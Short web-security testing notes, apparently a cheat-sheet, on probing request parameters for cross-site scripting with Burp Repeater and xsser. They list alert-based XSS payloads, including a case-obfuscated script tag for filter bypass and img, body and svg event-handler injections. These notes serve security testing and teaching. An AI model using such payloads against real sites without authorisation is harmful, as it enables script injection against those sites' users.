Automatic XSS bruter:
List of potential XSS payloads:
Online XSS scanner (lol shady):
Command in Kali:
xsser -h
To check if parameters in a web request are filtered, you can send a test payload and observe if and how they have been filtered or replaced by the server. The following can be set in the values for each parameter using Burp Repeater.
< > / ;
If no filtering is performed by the server, check if it uses word matching such as "<script" by running the following payload:
<script>alert('message')</script>
If the site is only blocking inputs such as the entire word "script" then test some other ways of injecting javascript:
<<ScRiPT >alert("obfuscated")<</sCRipT>
<img src='nevermind' onerror="alert('XSS');"/>
<body onload="alert(1)"/>
<svg onload="alert(1)">
While not exhaustive, the following commonly used HTML tags could allow a malicious user to inject script code: